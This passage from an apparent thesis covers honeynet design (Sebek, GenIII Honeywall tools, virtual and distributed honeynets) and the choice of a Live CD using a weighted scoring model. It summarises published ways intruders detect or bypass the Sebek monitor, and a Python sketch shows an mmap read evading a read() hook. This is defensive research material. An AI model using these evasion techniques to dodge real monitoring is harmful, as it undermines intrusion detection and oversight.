On the side of the client, Sebek is capable of collecting extensive information about attackers. In particular, the application can record the keystrokes of miscreants as well as recover the tools that were transferred to a honeypot in the course of a compromise. For these purposes, the internal System Call Table of the kernel must be manipulated. To be more precise, Sebek redirects specific system calls, e.g., to the internal read() or open() function, to its own data handling procedure. Thus, when a system call is invoked, the respective data stream can be logged, before control is passed back to the operating system. An overview of this process is given in Figure 3.7. The captured data is wrapped in a notification packet and is sent unidirectionally across the network to the server for further analysis (cmp. Figure 3.8). Once it reaches its destination, it may either be stored in a relational database, or it can be directly processed on the command line with the sbk_extract and sbk_ks_log.pl utilities. For example, to inspect a packet that is destined for port 1101 of the interface eth0, we must execute the utilities as follows:

    sbk_extract -i eth0 -p 1101 | sbk_ks_log.pl

[11] see http://www.honeynet.org/tools/sebek/

Figure 3.7: Redirection of System Calls in the Sebek Monitoring Software (Source: Based on Honeynet Project, 2003c)

Figure 3.8: Covert Data Channel Used by the Sebek Monitoring Software (Source: Based on Honeynet Project, 2003c)

To mitigate the risk of detection, Sebek uses several mechanisms to hide its presence from the eyes of probing blackhats: First, with the help of a cleaning component, the application is removed from the list of loaded kernel modules. Second, the software implements its own raw socket interface.
As a consequence, the TCP/IP stack of the operating system can be completely bypassed, and notification packets cannot be blocked by firewall devices such as IPTables any longer. In addition, Sebek can be configured to store a so-called magic value and a specific destination port number inside each packet. If another system within the honeynet finds such a packet, it is silently ignored. Thus, a covert channel is created, and intruders are unable to discover the data transfer even if a network sniffing program such as TCPDump is run. In spite of these features, adversaries have attempted to exploit architectural weaknesses in the Sebek client more recently in order to reveal the monitored environment. For instance, Madsys (2003) presented a brute force algorithm that is capable of finding traces of the Sebek module header in memory (see also Holz and Raynal, 2005a). With similar memory inspection techniques, sensitive configuration parameters of the keystroke logging utility could be disclosed or even changed (see Corey, 2004). These parameters are also likely to be found when specific heuristic algorithms are applied (see Dornseif et al., 2004b; Holz and Raynal, 2005a). A different detection strategy was demonstrated in the work of Dornseif et al. (2004a) with their proof of concept application Kebes: The software uses the mmap() function of the system kernel to map the contents of a file directly into the internal address space. As a result, logging operations could be fully circumvented, because the read() system call was not invoked at any time. In addition, Keong (2004) succeeded in restoring the original System Call Table on Microsoft Windows operating systems. In consequence, Sebek could be completely disabled. As can be seen, even sophisticated logging and monitoring technologies can often be bypassed or actively manipulated by savvy attackers. 
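Both the redirection of system calls and the mmap()-based evasion can be mimicked in user space. The following Python sketch is only an analogy and does not touch the kernel: the dictionary syscall_table, the function install_hook, and the list captured are hypothetical stand-ins for the System Call Table, the Sebek data handling procedure, and its log channel.

```python
import mmap
import os
import tempfile

captured = []                       # stands in for the Sebek log channel
syscall_table = {"read": os.read}   # toy stand-in for the System Call Table


def install_hook(table):
    """Replace the read entry with a wrapper that logs the data it returns."""
    original = table["read"]

    def logged_read(fd, count):
        data = original(fd, count)
        captured.append(data)       # record the data, then return as usual
        return data

    table["read"] = logged_read


install_hook(syscall_table)

# Create a temporary file that represents data accessed by an intruder.
with tempfile.NamedTemporaryFile(delete=False) as handle:
    handle.write(b"secret commands")
    path = handle.name

fd = os.open(path, os.O_RDONLY)
try:
    via_read = syscall_table["read"](fd, 64)    # passes through the hook
    logged_after_read = list(captured)
    with mmap.mmap(fd, 0, access=mmap.ACCESS_READ) as view:
        via_mmap = view[:]                      # table entry is never called
    logged_after_mmap = list(captured)
finally:
    os.close(fd)
    os.remove(path)
```

Both access paths return the same file contents, but only the first one leaves a trace in the log. This corresponds to the observation that a monitor which hooks read() alone does not see data obtained through memory mapping.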
Again, this highlights the fact that multiple data capture layers are required for collecting extensive information about Internet miscreants (cmp. Honeynet Project, 2004b). On the other hand, GenII honeynets do not specify how this information is to be stored or accessed in a later analysis (see Balas and Viecco, 2005). What is worse, many tools define their own data format without considering relationships to other data capture sources. Due to these incompatibilities, investigations of security-related incidents are made more difficult. Therefore, second generation honeynets have been superseded by more organized and structured architectures. We will have a closer look at these innovations in the following section.

3.3 GenIII Honeynets

In 2004, members of the Honeynet Project started the development of a more advanced type of honeynets (cmp. Honeynet Project, 2005d). These so-called GenIII honeynets are commonly deployed today and facilitate watching and analyzing malicious activities on the Internet. They implement all the features of preceding technologies, including the transparent network bridging, data control, and data capture capabilities. In comparison to GenII honeynets, they are significantly easier to set up though. With the bootable CD-ROM Roo [12], the entire Honeywall can be automatically installed to hard disk within minutes. At the end of the installation process, security professionals may then launch a graphical user interface in order to configure the individual components. Hence, a fully working honeynet gateway can be deployed within a short amount of time (see also Provos and Holz, 2007, and Chapter 5).

In addition, several new applications that are part of the Roo CD greatly support post-incident investigations (cmp. Balas and Viecco, 2005): For example, Argus [13] (Audit Record Generation and Usage System) is a monitoring system that processes all traffic in real time.
In contrast to IPTables or Snort, it is able to delimit single network flows. A flow is a set of packets that are bi-directionally transferred between two computer systems (cmp. Handelman et al., 1999; Paxson et al., 1998). Each flow is characterized by a start and end time and contains qualitative information such as the destination and source address, as well as quantitative information, e.g., the number of transmitted bytes and packets (see Brownlee et al., 1997; QoSient, 2006). As a result, system probes and penetration attempts can be clearly separated from other, unrelated events in the honeynet and examined in more detail.

With the passive fingerprinting utility p0f [14], it is possible to determine the operating system of a remote system (cmp. Zalewski, 2005). When a connection is initiated with a honeypot, inbound network packets are intercepted on the level of the Honeywall, before they are forwarded to the respective machine. By finding subtle discrepancies in the packet headers, p0f is then capable of creating a unique fingerprint of the host and identifying the system platform in question. For these purposes, the packet metrics as illustrated in Table 3.3 have proven helpful (see also Honeynet Project, 2002b; Stevens, 1994). Compared to other fingerprinting tools such as nmap [15] or xprobe [16], these operations are often slightly less accurate, because p0f solely processes captured network data and does not actively interact with the target system (see Zalewski, 2006). On the other hand, due to this characteristic, the utility cannot be detected either and, therefore, perfectly meets the requirements of the Honeynet Project (2004a).

Another crucial component in GenIII honeynets is the hflow daemon. It continually interacts with different data capture sources, including Snort, Sebek, Argus, and p0f, to create a unified data set that is independent from application-specific format definitions (see Balas and Viecco, 2005).
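The notion of a network flow that was introduced for Argus can be illustrated with a short aggregation routine. The Python sketch below groups packets that travel in either direction between the same two endpoints and derives the attributes named in the text. It is a minimal model under stated assumptions and not the record format of Argus: the Packet fields, the function names, and the sample addresses are hypothetical, and idle timeouts are not considered.

```python
from collections import namedtuple

# Hypothetical packet summary; field names are chosen for this sketch only.
Packet = namedtuple("Packet", "time src sport dst dport proto size")


def flow_key(p):
    """Build a key that is identical for both directions of a conversation."""
    a, b = sorted([(p.src, p.sport), (p.dst, p.dport)])
    return (p.proto, a, b)


def aggregate(packets):
    """Summarize packets into flows with start, end, packet and byte counts."""
    flows = {}
    for p in packets:
        f = flows.setdefault(
            flow_key(p),
            {"start": p.time, "end": p.time, "packets": 0, "bytes": 0},
        )
        f["start"] = min(f["start"], p.time)
        f["end"] = max(f["end"], p.time)
        f["packets"] += 1
        f["bytes"] += p.size
    return flows


packets = [
    Packet(1.0, "10.0.0.5", 40000, "192.168.1.2", 22, "tcp", 60),
    Packet(1.2, "192.168.1.2", 22, "10.0.0.5", 40000, "tcp", 60),
    Packet(2.5, "10.0.0.5", 40000, "192.168.1.2", 22, "tcp", 120),
    Packet(3.0, "10.0.0.9", 53000, "192.168.1.2", 80, "tcp", 400),
]
flows = aggregate(packets)
```

In this example, the three packets of the secure shell session are merged into a single bidirectional flow, while the request to port 80 forms a separate one. Sorting the two endpoints is one simple way to obtain a direction-independent key.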
[12] see https://projects.honeynet.org/honeywall/
[13] see http://www.qosient.com/argus/
[14] see http://lcamtuf.coredump.cx/p0f.shtml
[15] see http://insecure.org/nmap/
[16] see http://sourceforge.net/projects/xprobe

Metric                  Description
TTL Value               The value of the Time to Live (TTL) field in the header of a network packet is decreased whenever an intermediary device is passed. Once the value reaches zero, the packet is discarded to prevent infinite loops. Because system vendors use different initial values for the field, an analysis of the TTL value may help reveal the system platform of the host (see also SWITCH, 2002).
Don’t Fragment Flag     If the Don’t Fragment (DF) flag is set, a network packet is dropped in case it cannot be forwarded to another device without fragmentation. This flag is not used by older operating systems.
IPID Value              The value of the IP Identification (IPID) field uniquely identifies a fragmented packet. In various operating system implementations, this field is always set to zero.
ToS Value               With the help of the Type of Service (ToS) field, the preferred routing method can be indicated, e.g., to minimize network delays or maximize reliability. However, on most operating systems, this field is set to a fixed value.
Window Size             The Window Size determines the number of bytes that can be sent without acknowledgement. The value often corresponds to the Maximum Segment Size (MSS) of a packet.
Urgent Pointer Value    The value in the Urgent Pointer field must be set to zero unless the URG flag is set in the header of a network packet. However, in some platform implementations, this field is always initialized with a nonzero value.

Table 3.3: Metrics Used by the p0f Passive Fingerprinting Utility (Source: Based on Zalewski, 2005; Stevens, 1994)

The unified data set is hierarchically structured and stored in a relational database. Thus, alerts of the intrusion detection system can, for instance, be correlated with processes and network flows.
As a consequence, causal relationships between logical entities can be quickly discovered. Therefore, the approach provides “a more comprehensive representation of events” in contrast to GenII honeynets, as Balas and Viecco (2005, p. 4) argue. For administrative purposes, the data may be remotely accessed over the web-based interface Walleye. Walleye permits generating various summary and status reports about activities within the honeynet (see also Honeynet Project, 2005d). The software also supports exporting selected traffic flows in raw network format. As we will see in Chapter 5, these features enable security professionals to perform offline forensic investigations with external applications such as Honeysnap [17], which is used to efficiently recover attack tools and clear text communications of adversaries. Last but not least, Walleye greatly facilitates maintaining and configuring most parts of the Honeywall. For instance, it is possible to restart stalled processes or completely shut down the gateway to block all incoming and outgoing connections. Hence, administrators can stay in control of their decoys at all times and are able to mitigate risks for the external environment as best as possible.

3.4 Virtual Honeynets and Future Implementations

A large honeynet can be complex and expensive to administer if each honeypot is installed on its own physical machine. An alternative approach is the use of virtualization techniques similar to those described in Chapter 2. As we have explained, these techniques can help keep hardware costs down and make the deployment of a virtual honeynet easier (cmp. Provos and Holz, 2007). Even though a virtual honeynet may be built on a single system, a hybrid solution is more common in practice to date (cmp. Honeynet Project, 2003b). In this case, the individual honeypots are deployed within virtual machines, while the Honeywall is run on a dedicated machine (cmp. Figure 3.9).
This architecture has several advantages (see also Honeynet Project, 2004b): First, the implementation is more secure, because the Honeywall is physically isolated from the electronic baits. Thus, even if an attacker successfully compromises a virtual machine, the danger of getting privileged access to the honeynet gateway is comparatively small. Second, the Honeywall operates independently from the honeypots. Consequently, its performance level is not reduced if additional decoys are installed, and physical resources must be shared between a higher number of virtual machines. Due to these reasons, we favor the hybrid-based type in the scope of this thesis. A description of the corresponding setup process is the subject of Chapter 5.

Figure 3.9: Example of a Hybrid Virtual Honeynet (Source: Based on Honeynet Project, 2003b)

[17] see http://www.honeynet.org/tools/honeysnap/index.html

Figure 3.10: Example of a Distributed Honeynet (Source: Based on Spitzner, 2003c)

A new variant of honeynets is still in development at the time of this writing. The idea of these so-called distributed honeynets is the observation of adversaries on a large scale, while minimizing costs and maintenance efforts at the same time (cmp. Honeynet Project, 2004b). Although these objectives may appear contradictory at first sight, the concept may be realized with honeypot farms. A honeypot farm is a consolidated network of electronic baits running at a single location (see Spitzner, 2003c). It serves as a central monitoring station for multiple, virtually distributed honeypots: With the help of a so-called virtual private network (VPN), administrators of smaller honeynets transparently redirect their traffic to the honeypot farm. As a result, an attacker is tricked into believing that she is interacting with a specific network segment, while in reality, she is targeting machines which are possibly deployed in a completely different part of the world.
An illustration of these operations is shown in Figure 3.10. In comparison to traditional honeynets, the distributed architecture offers several advantages (see Honeynet Project, 2004b; Spitzner, 2003c): On the one hand, security professionals are able to quickly react to new threats, because resources, knowledge, and expertise can be concentrated at the honeypot farm. On the other hand, the level of involvement and risk of participating networks is decreased, because traffic flows solely need to be forwarded. Consequently, these networks are not directly affected by malicious activities.

However, it is also important to note that the technology is complex and challenging (cmp. Honeynet Project, 2004b). Because traffic redirection causes network latencies, suspicion may be raised on the side of intruders. In addition, global time synchronization and data sanitization issues have to be addressed as well. If these problems are properly solved though, a new generation of honeynets is likely to be released. For evaluation purposes, a preliminary version can already be downloaded from the official web page of the project [18].

3.5 Summary

This chapter provided an introduction to honeynet technology. A honeynet is a group of honeypots that are set up and interconnected in an isolated, non-productive network segment. In contrast to a single electronic bait, the architecture enables security professionals to observe adversaries on a larger scale and gain extensive information about their tools, tactics, and motives. However, it is significantly more complex to maintain and control, and potentially poses a severe threat to the external environment.
In order to minimize risks for uninvolved third parties as best as possible, we have presented three central standards that must be carefully taken into consideration in the deployment phase of a honeynet: First, data control mechanisms must ensure malicious activities are safely contained within the honeynet. Second, data capture facilities need to record suspicious traffic without raising the attention of attackers. Third and last, data analysis technologies must facilitate network forensic and post-incident investigations.

As we have pointed out, the technical implementation of these standards has changed over time and varies in different honeynet generations: GenI honeynets are only interesting for historical purposes. They solely provide rudimentary data control and data capture functions and are comparatively easy to detect. GenII honeynets can greatly mitigate these disadvantages by deploying a transparent bridge, the so-called Honeywall, that is capable of stealthily intercepting inbound and outbound network connections. Moreover, the device includes several data control as well as data capture layers: With the help of the IPTables packet filtering software and the Snort Inline intrusion prevention system, it is possible to block or disable malicious packets going out of the honeynet. Furthermore, the rule-based intrusion detection system Snort is able to record traffic flows and identify penetration attempts at the network perimeter. Last but not least, the monitoring utility Sebek permits capturing both the keystrokes and attack tools of adversaries. It is directly installed on a decoy and regularly sends logged information over a covert channel to the honeynet gateway.

One downside of GenII implementations is their heterogeneous data sources and data formats. Due to subtle incompatibilities between the different components, investigations of security-related incidents are complex and time-consuming.
These issues are addressed in GenIII honeynets by uploading the collected data to a central database. The database can be comfortably accessed with the web interface Walleye. In comparison to preceding technologies, GenIII honeynets are also easier to set up and administrate. With the bootable CD-ROM Roo, the Honeywall can be automatically installed within minutes. In many cases, administrators use a dedicated machine for these purposes, while they run the individual honeypots within virtual machines. This hybrid approach permits keeping hardware costs down and reducing maintenance efforts.

We have also briefly described the fundamentals of distributed honeynets, an advanced type of honeynet that is still in development at the time of this writing. By redirecting traffic from smaller networks to a honeypot farm, it is hoped intruders can be watched on a large scale. Despite this promise, the architecture has to cope with various challenges such as latency and time synchronization problems. For this reason, it must be thoroughly evaluated before a new generation of honeynets can be released.

The concepts outlined in the previous sections serve as a theoretical foundation for our own honeynet implementation that is illustrated in detail in Chapter 5. In addition, we present a so-called Live CD that makes the deployment phase of electronic baits easier and helps security professionals collect autonomously spreading worms, viruses, and other types of self-propagating malware. The development process of this CD is the subject of the following chapter.

[18] see http://distributed.honeynets.org/

4 Development of a Live CD-Based Honeypot

Deploying a larger number of honeypots can be complex and laborious (cf. Mokube and Adams, 2007; Sadasivam et al., 2005). Operating systems as well as specific vulnerable services need to be installed, and monitoring devices must be adequately tuned.
However, many actions have to be repeated multiple times during the configuration process, e.g., setting network parameters or creating user accounts. These administrative tasks are time-consuming but do not lead to a significant increase in knowledge and expertise in the long term. With the help of a so-called Live CD, deployment and initialization of electronic decoys can be automated to a great extent, thus facilitating the work of security professionals and permitting them to focus on computer crime-related incidents.

A Live CD comprises a complete operating system as well as a number of selected applications and “is typically designed to boot and run entirely from a read-only medium” (Negus, 2007, p. 7). At runtime, data is copied to and solely modified in volatile memory. When the system is shut down or rebooted, all changes are reset. These characteristics make Live CDs perfectly suited for honeypot-based research, as a decoy can be quickly put back online after a compromise without major modifications.

In the course of this thesis, we develop our own derivative of such a CD. End-users are able to boot our disk and start a pre-configured, fully working low-interaction honeypot with a simple click. Thereby, it is possible to deploy numerous electronic baits and collect data on a large scale within a short amount of time.

With respect to the development process, it is important to note that we do not have to create our system from scratch. At the time of this writing, more than 300 different Live CDs are already available (see Brand, 2007). For this reason, we may use an existing distribution and remaster it according to our requirements, i.e., we substantially change the base of the system and adapt existing features to our needs. Evaluating every available CD in order to choose an appropriate candidate would be beyond the scope of this thesis, though. We are not aware of any scientific work on the relative performance of Live CDs either.
Therefore, we only assess the most popular versions as listed by Jordan (2006) and select the most promising distribution as a starting point for our remastering project.

Outline of the Chapter

This chapter is outlined as follows: In the upcoming section, we give a short overview of the most prevalent Live CDs. We assess the different distributions according to a set of pre-defined decision attributes and select the candidate that best matches our requirements. The corresponding evaluation and selection model is the subject of Section 4.2. A description of the development and remastering process of our own Live CD is presented in the third section of this chapter. With the help of a preliminary but fully working prototype, we are able to capture autonomously spreading malware on a large scale and analyze threats that are commonly found on the Internet at the time of this writing. A summary of the results of our research is given in Section 4.3.4.

4.1 Overview about Popular Live CD Distributions

According to Jordan (2006), the top Live CD distributions are Knoppix, Kanotix, SimplyMEPIS, PCLinuxOS, Slax, and Ubuntu. We briefly illustrate the major characteristics and features of these CDs in the following.

• Knoppix: Knoppix [1] is a popular free Live CD developed by Klaus Knopper and is regarded as “the most mature and widely used bootable Linux CD” (Negus, 2007, p. 24). Software packages include a complete desktop environment with office, Internet, and multimedia applications. Hardware support and compatibility are excellent (cf. FrozenTech, 2004b). Due to its extensive modification possibilities (FrozenTech, 2005a) and a vibrant community, a lot of other distributions are derived from Knoppix, e.g., the module-based version Morphix [2] or Knoppix-STD [3], a Live CD that provides a vast collection of security tools and addresses the needs of system administrators as well as penetration testers.
• Kanotix: Kanotix [4] is a Debian-based Live CD and free of charge. It is especially known for its outstanding hardware support (see FrozenTech, 2004b) and contains a lot of additional software packages. Remastering Kanotix is possible but quite difficult, because only little official documentation exists.

• SimplyMEPIS: In contrast to many other Linux distributions, SimplyMEPIS [5] is a commercial Live CD developed by Warren Woodford. The latest version is based on Ubuntu (see below). One of the exceptional features of SimplyMEPIS is its ability to be used not only as a Live CD, but as an entire operating system installed to hard disk. It is primarily designed for everyday computing but may be remastered with some effort. Official guides and manuals facilitate these activities.

• PCLinuxOS: PCLinuxOS [6] is a free Live CD for private end-users and is one of the few distributions derived from Mandrake. Its hardware support is very good. As Jordan (2006) states, “compared to Knoppix, MEPIS and Kanotix, there are fewer applications” though. Adapting the CD is comparatively easy due to a number of scripts that permit quick modifications of the whole system.

• Slax: Slax [7] is a well-known distribution (cf. FrozenTech, 2004a) and is based on Slackware as the name suggests. It is free of charge and is primarily used for private purposes. Because of its small size, the distribution may be copied to a USB flash drive. Similar to Knoppix, its hardware support is excellent. One of Slax’s unique features is its modular design: Modules contain one or more specific software applications and may be added or removed without affecting other parts of the system. This makes remastering the Live CD extremely easy.

[1] see http://www.knoppix.org/
[2] see http://www.morphix.org/
[3] see http://s-t-d.org/
[4] see http://kanotix.com/
[5] see http://www.mepis.org/
In case developers still require help, they are supported by a growing community and several step-by-step guides.

• Ubuntu: Ubuntu [8] is a free, desktop- and multimedia-oriented Debian derivative by Mark Shuttleworth. At the time of this writing, it heads the list of the most popular Linux distributions (see DistroWatch, 2007). Presumably, this position may also be attributed to its outstanding usability (cf. FrozenTech, 2005b). Similar to SimplyMEPIS, Ubuntu may function both as a Live CD and as an operating system copied to hard disk. Remastering activities require an in-depth knowledge of the underlying system, even though the individual segments are extensively documented.

The main characteristics of each distribution are summarized in Table 4.1. These Live CDs are assessed and evaluated using our own selection model, which is presented in the next section.

[6] see http://www.pclinuxos.com/
[7] see http://www.slax.org/
[8] see http://www.ubuntu.com/

Distribution   Assessed Version   Size         Based on    Kernel Version
Knoppix        5.11               700 MB       Debian      2.6.19
Kanotix        2007-RC6           701 MB       Debian      2.6.22
SimplyMEPIS    6.5                693 MB       Ubuntu      2.6.15
PCLinuxOS      2007               299-685 MB   Mandriva    2.6.18.8
Slax           6-RC6              41-202 MB    Slackware   2.6.21.5
Ubuntu         7.10               697 MB       Debian      2.6.22

Table 4.1: Main Characteristics of Live CD Distributions (Source: Brand, 2007; Wikipedia, 2007)

4.2 Selection Model for the Live CD Distributions

To come to a rational decision and choose an adequate candidate for our own distribution, we go through a sequential selection process as indicated in Figure 4.1: First, we identify several influencing factors that greatly affect the development and later use of our CD. We refer to those factors as attributes in the following. However, we do not consider all attributes as equal. Therefore, we use weights to express their relative importance. Finally, we apply a well-known scoring model on all distributions to make a recommendation.
Figure 4.1: Selection Process for the Live CD Distributions

4.2.1 Overview about the Decision Attributes

Attributes “provide a means of evaluating goal accomplishments” (Yoon and Hwang, 1995, p. 8). Concerning our decision problem, we identify five attributes as crucial: legal restrictions and licensing, hardware compatibility, usability, ease of adaptability, and documentation and official support. A short description of each attribute is presented below.

• Legal restrictions and licensing: The release version of our Live CD will be freely distributed over the Internet for research purposes and as open source, i.e., the entire source code will be available for future modifications by third parties (cf. Perens, 1998). For this reason, the base distribution must be published under the GNU General Public License (GNU GPL, see Free Software Foundation, 2007) or a similar licence that permits legal copying and adaptation without any charges.

• Hardware compatibility: The CD is supposed to run quickly after startup on different types of computer systems. Therefore, the base system needs to support common hardware devices, especially network interface cards and display adapters. Ideally, these devices are properly configured after booting without any significant manual intervention. For example, network parameters and IP address information are to be automatically set if the system is connected to a server with DHCP (Dynamic Host Configuration Protocol) support.

• Usability: Even though the CD is expected to be used mostly by network administrators and security professionals with a strong computer background, its design needs to be as intuitive and as easy as possible, i.e., the honeypot should be started in a user-friendly, graphical environment.
Furthermore, common administrative tasks, e.g., changing the password of the superuser, should be carried out quickly to permit focusing on data collection- and analysis-related activities.

• Ease of adaptability: The CD must be easily adaptable, i.e., the basis of the distribution needs to be extendable and must provide sophisticated package management tools to permit installation, modification, and removal of software applications.

• Documentation and official support: Remastering a Live CD is a complex task and requires a thorough understanding of the underlying operating system. Step-by-step guides, collaborative platforms such as forums, and officially supported manuals can strongly facilitate this process and are therefore regarded as a plus.

As we have already mentioned, these attributes are not equally important to us. For this reason, we apply a basic weighting technique that is outlined in the next section.

4.2.2 Calculation of the Decision Weights

With the help of weights, we are able to indicate the relative importance and prioritization of the individual attributes in a quantitative way. According to Yoon and Hwang (1995, p. 11), one possibility to assess those weights is “to arrange the attributes in a simple rank order, listing the most important attribute first and the least important attribute last”. Then, for n attributes, we simply apply the following formula to calculate the weight w_j for the jth attribute and rank r_j (see Stillwell et al., 1981):

\[ w_j = \frac{n - r_j + 1}{\sum_{k=1}^{n} (n - r_k + 1)} \tag{4.1} \]

With regard to our evaluation, we assign the following ranks to the different attributes: Legal restrictions and licence fees have the greatest impact on the development and future distribution of our CD. For this reason, we rank this attribute as most important.
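As a worked illustration of Formula 4.1, assume n = 5 attributes whose ranks are a permutation of 1, ..., 5 without ties. This is plain arithmetic on the formula and makes no assumptions beyond that; the weights add up to 1 by construction.

```latex
\[
\sum_{k=1}^{5} (5 - r_k + 1) = 5 + 4 + 3 + 2 + 1 = 15,
\qquad
w_j = \frac{6 - r_j}{15}
\]
\[
\begin{aligned}
r_j = 1 &: \; w_j = 5/15 \approx 0.33 \\
r_j = 2 &: \; w_j = 4/15 \approx 0.27 \\
r_j = 3 &: \; w_j = 3/15 = 0.20 \\
r_j = 4 &: \; w_j = 2/15 \approx 0.13 \\
r_j = 5 &: \; w_j = 1/15 \approx 0.07
\end{aligned}
\]
```

The attribute ranked most important therefore receives one third of the total weight, five times as much as the attribute ranked last.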
Depending on the ease of adaptability as well as the amount of documentation and official support, remastering the base system can be significantly facilitated or made more difficult. Thus, these attributes are ranked second and third. Finally, hardware compatibility and usability are considered least important, because they have minor effects on the development process. A summary of the attribute ranks and their corresponding calculated weights is given in Table 4.2.

Attribute                            Attribute Rank   Attribute Weight
Legal restrictions and licensing     1                0.33
Hardware compatibility               4                0.13
Usability                            5                0.07
Ease of adaptability                 2                0.27
Documentation and official support   3                0.2

Table 4.2: Attribute Ranks and Weights for the Candidate CDs

4.2.3 Overview about the Scoring Model

Considering our six candidate CDs and the different evaluation criteria, we have a classic Multiple Attribute Decision Making (MADM) problem, i.e., we need to make a preference decision over a number of given alternatives that are characterized by multiple attributes (cf. Yoon and Hwang, 1995). Several approaches are recommended in the literature to solve such a problem (see also Yoon and Hwang, 1981): For instance, the Simple Additive Weighting (SAW) technique is a well-known scoring model which is both robust and easy to apply (cf. Rowe and Pierce, 1982). With the SAW technique, we can compute a weighted sum for each Live CD, favoring the alternative with the highest result. Mathematically, the weighted sum for an alternative A_i can be expressed as a value function V(A_i) as shown in Formula 4.2, where r_{ij} is the jth attribute value of the ith alternative, and w_j refers to the corresponding attribute weight.

\[ V(A_i) = \sum_{j=1}^{n} w_j \cdot r_{ij}, \qquad i = 1, \ldots, m \tag{4.2} \]

Attribute values are derived from a five-point ordinal scale that measures the relative performance of an alternative in comparison to other candidates for a given attribute. A value of 1 indicates very poor relative performance, while a value of 5 reflects very high relative performance. If an alternative is comparable to the others, we assign a neutral value of 3. This process is illustrated in Figure 4.2.

Figure 4.2: Example of an Ordinal Rating Scale

We can now calculate the attribute values for all alternatives and apply the SAW scoring model in order to choose an adequate candidate for our own Live CD. These operations are the subject of the next section.

4.2.4 Selection of an Adequate Candidate CD

We use the ordinal five-point scale as outlined in the previous section to assign attribute values to the different alternatives. The ratings are based upon our own evaluation and surveys by FrozenTech (2004b,a, 2005a,b). The final results are shown in Table 4.3.

Concerning the attribute legal restrictions and licensing, all alternatives are assigned the neutral value 3, because they are freely available over the Internet, except for SimplyMEPIS, which is distributed under a commercial licence. This is why this Live CD is rated lower than all other candidates. Kanotix has superior hardware compatibility and is therefore assigned the highest attribute value. Knoppix, Slax, and PCLinuxOS have slightly better hardware support in comparison to SimplyMEPIS and Ubuntu. The usability of most candidate distributions is outstanding; only PCLinuxOS performs below average because of its limited number of applications. Slax is easiest to adapt due to its modular design, closely followed by PCLinuxOS.
SimplyMEPIS and Ubuntu are relatively difficult to remaster since they require a more thorough understanding of the base system. Finally, Knoppix is leading regarding documentation and official support. Many guides, manuals, and collaborative platforms facilitate modifications of the CD, similar to PCLinuxOS and Ubuntu. In contrast, Kanotix is extremely badly documented and, hence, is assigned an attribute value of 1.

Distribution   Legal Restrictions   Hardware        Usability   Ease of        Documentation and
               and Licensing        Compatibility               Adaptability   Official Support
Knoppix        3                    4               4           3              5
Kanotix        3                    5               4           3              1
SimplyMEPIS    1                    3               3           2              3
PCLinuxOS      3                    4               2           4              4
Slax           3                    4               4           5              3
Ubuntu         3                    3               5           2              4

Table 4.3: Attribute Values for the Candidate CDs

As we have already explained, these attribute values are multiplied with the corresponding attribute weights to compute the weighted sum for each alternative in accordance with Formula 4.2. As can be seen in Table 4.4, Slax is considered to be the best choice for our own Live CD with a weighted sum of 3.7. Good alternative candidates are Knoppix and PCLinuxOS as well. The results are not very surprising as the distributions are well-engineered, while being easy to use and adapt at the same time. Kanotix is rated slightly below average due to its lack of official documentation. In comparison to leading Live CDs, Ubuntu does not have any significant advantages, except for its usability. SimplyMEPIS is, on the whole, regarded as a rather unsatisfactory solution, mainly because of its commercial licence.

To test the robustness of our decision, we perform a sensitivity analysis, i.e., we change the significance of different attributes, repeat the computation step, and compare the newly generated weighted sums with the original values. Specifically, we now consider the attribute ease of adaptability as the most important decision criterion, followed by hardware compatibility, and legal restrictions and licensing.
Documentation and official support and usability are ranked 4th and 5th. The results of the sensitivity analysis are listed in Table 4.5. As can be seen, Slax is still the leading alternative, while PCLinuxOS is now preferred over Knoppix. Kanotix performs slightly better than Ubuntu. The rating of SimplyMEPIS remains stable.

Distribution   Legal Restrictions   Hardware        Usability   Ease of        Documentation and   Weighted
               and Licensing        Compatibility               Adaptability   Official Support    Sum
Knoppix        1                    0.53            0.27        0.8            1                   3.6
Kanotix        1                    0.67            0.27        0.8            0.2                 2.9
SimplyMEPIS    0.33                 0.4             0.2         0.53           0.6                 2.1
PCLinuxOS      1                    0.53            0.13        1.07           0.8                 3.5
Slax           1                    0.53            0.27        1.33           0.6                 3.7
Ubuntu         1                    0.4             0.33        0.53           0.8                 3.1

Table 4.4: Attribute Ratings and Weighted Sums for the Live CDs

Distribution   Legal Restrictions   Hardware        Usability   Ease of        Documentation and   Weighted
               and Licensing        Compatibility               Adaptability   Official Support    Sum
Knoppix        0.6                  1.07            0.27        1              0.67                3.6
Kanotix        0.6                  1.33            0.27        1              0.13                3.3
SimplyMEPIS    0.2                  0.8             0.2         0.67           0.4                 2.3
PCLinuxOS      0.6                  1.07            0.13        1.33           0.53                3.7
Slax           0.6                  1.07            0.27        1.67           0.4                 4.0
Ubuntu         0.6                  0.8             0.33        0.67           0.53                2.9

Table 4.5: Weighted Sums for the Live CDs after the Sensitivity Analysis

4.2.5 Summary of the Methodology

To select an adequate distribution as a basis for our own Live CD, we have assessed six potential candidates against a list of multiple attributes, namely legal restrictions and licensing, hardware compatibility, usability, ease of adaptability, and documentation and official support. Since not all attributes were equally important to us, we have applied weights to indicate their relative significance. These weights were used as input parameters to the Simple Additive Weighting model. The model computes a total evaluation score for each alternative, the so-called weighted sum.
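The weighting and scoring steps summarized here can be replayed in a few lines of Python. The following is a minimal sketch rather than the tooling used for the thesis: the function names `rank_sum_weights` and `saw_scores` and all variable names are hypothetical, the attribute values are those listed in Table 4.3, and the two rank vectors correspond to the original ranking and to the ranking used in the sensitivity analysis.

```python
# Attribute order: legal, hardware, usability, adaptability, documentation
RATINGS = {
    "Knoppix":     [3, 4, 4, 3, 5],
    "Kanotix":     [3, 5, 4, 3, 1],
    "SimplyMEPIS": [1, 3, 3, 2, 3],
    "PCLinuxOS":   [3, 4, 2, 4, 4],
    "Slax":        [3, 4, 4, 5, 3],
    "Ubuntu":      [3, 3, 5, 2, 4],
}

BASE_RANKS = [1, 4, 5, 2, 3]         # ranks as in Table 4.2
SENSITIVITY_RANKS = [3, 2, 5, 1, 4]  # ranks used for the sensitivity analysis


def rank_sum_weights(ranks):
    """Rank-sum weights: w_j = (n - r_j + 1) / sum_k (n - r_k + 1)."""
    n = len(ranks)
    total = sum(n - r + 1 for r in ranks)
    return [(n - r + 1) / total for r in ranks]


def saw_scores(ratings, weights):
    """Simple Additive Weighting: weighted sum of attribute values per alternative."""
    return {
        name: sum(w * r for w, r in zip(weights, values))
        for name, values in ratings.items()
    }


base = saw_scores(RATINGS, rank_sum_weights(BASE_RANKS))
sensitivity = saw_scores(RATINGS, rank_sum_weights(SENSITIVITY_RANKS))

for name in RATINGS:
    print(f"{name:12s} {base[name]:.1f} {sensitivity[name]:.1f}")
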